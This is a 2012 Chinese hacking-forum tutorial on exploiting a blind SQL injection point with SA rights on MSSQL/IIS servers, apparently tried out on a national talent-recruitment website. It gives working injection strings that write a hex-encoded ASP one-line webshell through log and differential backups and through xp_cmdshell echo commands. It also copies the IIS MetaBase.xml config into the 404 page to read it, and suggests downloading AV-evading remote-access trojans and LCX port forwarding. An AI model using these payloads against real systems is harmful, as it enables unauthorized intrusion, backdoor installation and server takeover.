找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 sa权限的教程.
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1963|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
1 |0 I5 E& |, N4 X6 ?/ o  @* G: e* x+ z7 d* ~% Q

+ N" T9 L* H: L4 U* W                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
' C! R) n* y. {- n; K# D5 h) f# v# x
                                                                 9 i5 o2 U. r9 C8 T- k8 j
                                                                 
. J: z' Q! h' L. P- G                                                                  论坛: http://www.90team.net/! [! H/ A+ p8 n# N+ j2 ~
6 y3 @- t4 s2 s2 R% l* O% X
0 m/ g7 O3 F# Z* x
$ _  O2 C. ~4 r0 s2 F' x0 o
友情检测国家人才网
. d6 k7 s& k1 |# v/ r+ n5 E+ X, k" K, k7 @5 [+ Q" v
0 f. b# o/ F( q: i& B2 n
内容:MSSQL注入SA权限不显错模式下的入侵# O. r. m/ j" I$ W, a; ~

, K8 c, N1 T; a
  T1 x9 a* |- ^/ s2 X3 Q! o' I一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。7 ~$ Y4 w, R  q8 B. I
# e! k" f/ q$ t" @: s0 U; L
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。  C5 `" U$ X6 W7 ]/ a1 m) R; L" a
& ~0 a+ h! |8 \1 b! n) P

2 Y* u+ v2 P/ P8 R7 b这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
  M. O7 T# I0 u1 `7 E. {: f" d- J# }$ ^! n3 X# \
思路:
: d6 L* z+ ?  I7 }$ Y4 c9 f$ j
- y; W+ w4 h" |# I首先:" e% q* B. `% s, t& B& @' W0 C) T

" [3 H2 @& d% B# ]$ n/ u通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
% l$ k- J8 Z9 y( J& E$ }6 c+ Z& y8 U6 g$ @& U5 k  @1 @8 V' L
1.日志备份获得Webshell
! L9 }4 U, ?, P8 u8 q  w8 F5 v- f: v3 _; E
2.数据库差异备份获得Webshell
$ X' J' N& I1 M; X
. }. ^; o* m+ G  M" B# V- P. U4.直接下载免杀远控木马。% U5 M5 t4 r* y/ S: Q( p0 Q6 |

! s! w( G; C8 P& D/ L4 v5.直接下载LCX将服务器端口转发出来
5 O$ `) H( ]) ?. e3 O
9 u( C2 s9 H; K$ M7 D7 ^8 _& Y6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
! Z4 i: P3 k! v# G. \: ?/ c5 R5 _+ z' H$ R: p( b) j: {

: _& x/ @9 p' |8 Z% V9 G
- y  K0 G% r' m1 b( O2 D0 {4 |在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
+ K: d& N* O$ b  W1 y5 |
) Y& T, B# m2 Y8 t% p9 ~! ?* g我直接演示后面一个方法! X1 I  T  c! D, L. f; H) f

0 e  s' E  j% w- R% e- T+ l. ?8 u2 c# Q7 W
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL ; _; p/ q7 Y( B1 B/ g1 O: {
0 h! v# p- P, i$ a2 v( D3 O; g4 K! }' N
. L; n* n; c) i; r  f* B8 q; I' \2 _
, ]  Q" {& _2 c2 q) ^

* ~1 e( Y" U) n( g& O8 S◆日志备份:
4 }8 `4 b# c. t+ }5 |6 `. L8 g+ F2 }, ~+ _3 V
  o% s% d! E7 l( m
1. 进行初始备份/ f, Y/ J" F% h' O  V( a
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--( p5 p" l0 S  x; j8 o7 N

, f8 S$ H( ]+ ?+ t( D3 E$ K- P( L2. 插入数据
7 N+ B8 d! J/ n+ V  [3 ?;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
/ P8 ~' `9 ~8 r* G
# h! `. W* `! s1 ^$ [# R; k0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>0 [7 l7 h# U+ e" s, H9 C
  
/ U" ~& \6 B0 D: S& G9 N! H3. 备份并获得文件,删除临时表3 u# h5 p9 t2 J7 F+ V/ G& w
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--8 g# L& E0 Z. g, Z) k
* `5 A' s- \6 O

6 X- m  N8 U1 I. s' U
7 A/ s, K$ D1 e& b6 e6 W◆数据库差异备份9 L. p* @! [# _; I( |: B1 |, Z' R0 S
0 ~( e7 v6 x* J4 b& H7 w% D6 P
(1. 进行差异备份准备工作
% s& F! Z" f, Y9 y* F6 G) A8 H2 ?. G  K$ E" s
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--- @5 g, p1 T4 D) o( R

& @- }# k; F6 j( }上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码# M% t- |( ]; _/ Q
- l% b5 z& b: P- \! u+ }; |# I

' f- ?  o) X; d% n6 U+ Z(2. 将数据写入到数据库
7 P3 A2 \( [' N, a;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- 9 |2 A6 k$ ]/ J! @# ~3 v

& U5 I% B8 W! n; q0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
! P* {3 @, o9 ]& M3 G" ^3 n& F
; v; L" X1 m8 q4 T" `* k  D  ]4 r9 V$ g3. 备份数据库并清理临时文件5 W2 \8 c( h# W9 ?/ W
  @: Y9 p1 y- [4 H
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
  n! @- h7 ]! @
" w' C9 c) n4 V9 L( a0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
# w! p6 }% X# V- H) X
, D2 ~& E, J9 m- ?, h* S7 J. T
- \- i* O# l3 C' b0 v; ^$ l4 r5 a" [3 W/ a3 w
用^转义字符来写ASP(一句话木马)文件的方法:   
! ]* k+ b" B) z% l" u& ^% p' ^7 h4 {$ ]- j' F& U$ R5 S! h8 J
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--. j% Z9 i0 O# F8 u

7 Z( @" p: v+ W# D/ N3 U# b" u2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
' R% r) M! c3 Z4 d" N5 I/ I# X6 U/ W$ E* B& \
读取IIS配置信息获取web路径1 I* r+ O5 h( F1 e9 k9 q
) E; F4 e3 F4 j/ ?: `
     ' v" ^! R$ C5 q2 {' k. X5 X  A* g
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--! @0 |6 p! @8 y+ c1 P$ r5 Q

- M9 T5 V$ l6 j$ E执行命令* M/ F- J$ A- u9 L7 x! r; m
     
% C* x0 e0 k  o: |/ ]4 f! B2 q     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
9 u0 Q, _- [; k+ D4 p/ [" J+ M- y& U# a* X0 E

. j; |# C! H8 e8 {* a% \7 u% {- e
1 O8 n& Y2 f! i# `0 R4 k7 H7 G. U. P, h. K% E7 i  ~) y9 G
) A1 x4 W6 [2 _) r2 g; e) D

& s% D- R* y3 `# j' a, @0 d! l
1 M% J/ I5 R! D  h# [0 \& |& f  f9 n$ Q- o' s

: j+ E+ @/ {8 n: N* x8 l7 X2 _5 P
8 _* f, C' @" ]4 P4 e
4 M, Y. Q& _: ?. l1 M

& c( M0 e/ d) q* f4 }' U6 r5 j' \
- \; J6 }  y7 `. _& N6 W* }# A/ P- i( {
1 Q! I9 v* K& Q# a& W0 n6 i6 q
! [; F' U* r5 S9 l! F) I+ `0 q9 `" w$ N
9 z' g# j* C( Y6 v  ]7 t
" A: J3 k) m3 S  R* r, `1 Y! B

& W( I+ O5 V( j7 x0 H5 o# `
* x" V& ?* k% l9 q% Z, Q# G0 }4 Q2 y9 N6 u7 }* J" }

: o& @4 u: H" a9 O
" B4 G4 w) t3 q0 x: P& J4 W, P4 g
0 b# r0 J2 w* t
, Z+ ~/ V% |  b# H  e- |& }2 f9 H0 a2 P7 D, {
4 y: n+ @% m: ^" M
8 |5 u8 ~, l+ ~4 F# k
. e# ^- z! A4 u  P6 o9 V* l
/ ~& g6 ?  d9 ]0 i

+ }8 {1 q0 B3 S5 E. _' O& k) |! A' o3 |1 \' n- j

& P. [( W% Y& @* n, ?( Q. ]. p3 |3 M: {# U/ S5 Z& G$ L
2 E. Z9 }8 T) K: H
, |5 w# x1 [2 s* F- i$ g

3 ^- d. l7 y1 r0 S1 P% Q% L- p
  o8 S; r# H; s' J( t. a( O
. o9 W& Y  O) h4 g1 l9 p
  D8 h3 [* ]( L/ f' F- F, U) ~; U9 Q- J& N2 ^$ c" T

6 F; l: e4 L; A3 o6 s9 Z0 y+ j7 D3 K6 f
  Q. Q# `. S# C+ F0 s

5 g4 K2 g  c1 R' L+ A! d; |
* B0 W+ r9 v( Q- a
" S* |0 A& ^/ A: n5 d, D+ A
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表